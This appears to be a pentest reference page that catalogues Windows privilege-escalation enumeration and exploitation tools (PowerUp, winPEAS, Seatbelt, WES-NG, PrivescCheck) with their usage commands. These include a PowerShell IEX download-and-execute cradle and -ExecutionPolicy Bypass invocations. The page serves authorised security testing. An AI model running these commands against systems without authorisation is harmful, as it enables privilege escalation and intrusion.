Tools

1. Tools Overview

This document provides an organized overview of enumeration and exploitation tools used for privilege escalation on Windows systems.

1.1 Enumeration Tools

These tools are essential for identifying vulnerabilities and misconfigurations that could lead to privilege escalation.

Tool

Description

PowerSploit’s PowerUp

PowerShell script for identifying and exploiting local privilege escalation vulnerabilities.

Watson

C# implementation for detecting vulnerabilities in Windows, similar to the deprecated Sherlock tool.

Sherlock (Deprecated)

PowerShell script for identifying missing patches for privilege escalation.

BeRoot

Cross-platform tool for privilege escalation checks on Windows, Linux, and Mac.

Windows Exploit Suggester (WES)

Suggests potential exploits based on system information and installed patches.

WindowsEnum

PowerShell script for privilege escalation enumeration on Windows.

Seatbelt

C# project for auditing security-related settings and configurations on Windows systems.

Powerless

Script focused on legacy Windows environments for privilege escalation enumeration.

JAWS

PowerShell script for comprehensive Windows enumeration.

winPEAS

Script for identifying privilege escalation vectors on Windows.

Windows Exploit Suggester - Next Generation (WES-NG)

Updated version of WES for accurate exploit suggestions.

PrivescCheck

Standalone executable for checking common privilege escalation vectors on Windows systems.

2. Privilege Escalation Techniques

2.1 Enumeration Tools: Usage Instructions

The following section details how to use specific enumeration tools to gather system information and identify potential vulnerabilities.

PowerSploit’s PowerUp

Usage:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')

Watson

Usage: Compile or download Watson to use in .NET environments.

Windows Exploit Suggester

Initial Steps:

systeminfo > systeminfo.txt
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt

Seatbelt

Full Security Check:

Seatbelt.exe -group=all -full

winPEAS

Usage: Download and execute winPEAS on the target machine.

2.2 Exploitation Tools

Once vulnerabilities are identified, these tools can assist in exploitation.

BeRoot

Usage: Run the appropriate version for the target OS and follow prompts for privilege escalation checks.

PrivescCheck

Usage:

powershell -ExecutionPolicy Bypass -File .\PrivescCheck.ps1
powershell -ExecutionPolicy Bypass -File .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended

JAWS

Usage:

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

Windows Exploit Suggester - Next Generation (WES-NG)

Usage:

python3 wes.py --update
python3 wes.py systeminfo.txt

3. Usage Instructions

3.1 Initial System Information Gathering

Begin by collecting essential system information for analysis and exploitation strategy development:

systeminfo > systeminfo.txt

3.2 Updating and Running Windows Exploit Suggester

Update the Windows Exploit Suggester database and analyze the collected system information:

./windows-exploit-suggester.py --update
./windows-exploit-suggester.py systeminfo.txt

3.3 Running Seatbelt for a Comprehensive Check

Conduct a full security audit using Seatbelt:

Seatbelt.exe -group=all -full -outputfile="C:\Temp\seatbelt_report.txt"

3.4 Executing PowerUp

Scan for privilege escalation vulnerabilities using PowerUp:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerSploit/master/Privesc/PowerUp.ps1')
PreviousWindows Privilege EscalationNextWindows Version and Configuration

Last updated